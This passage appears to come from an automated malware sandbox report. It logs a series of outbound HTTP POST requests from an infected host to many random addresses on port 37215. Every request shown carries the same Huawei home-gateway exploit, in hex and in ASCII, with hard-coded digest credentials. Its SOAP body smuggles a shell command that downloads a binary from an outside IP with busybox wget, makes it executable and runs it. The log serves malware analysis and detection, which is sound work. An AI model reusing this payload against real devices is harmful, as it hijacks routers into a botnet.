                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1122192.168.2.154862837.171.84.12437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930346966 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1123192.168.2.1543800157.0.76.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930368900 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1124192.168.2.155111831.167.22.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930382967 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1125192.168.2.1548442138.211.17.23937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.930393934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1126192.168.2.1538962121.245.186.15837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931272984 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1127192.168.2.1533018197.195.227.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931272984 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1128192.168.2.154931241.220.78.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931312084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1129192.168.2.1551904157.157.166.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931312084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1130192.168.2.1550270102.148.127.12337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931320906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1131192.168.2.1543024157.228.0.13837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931360960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
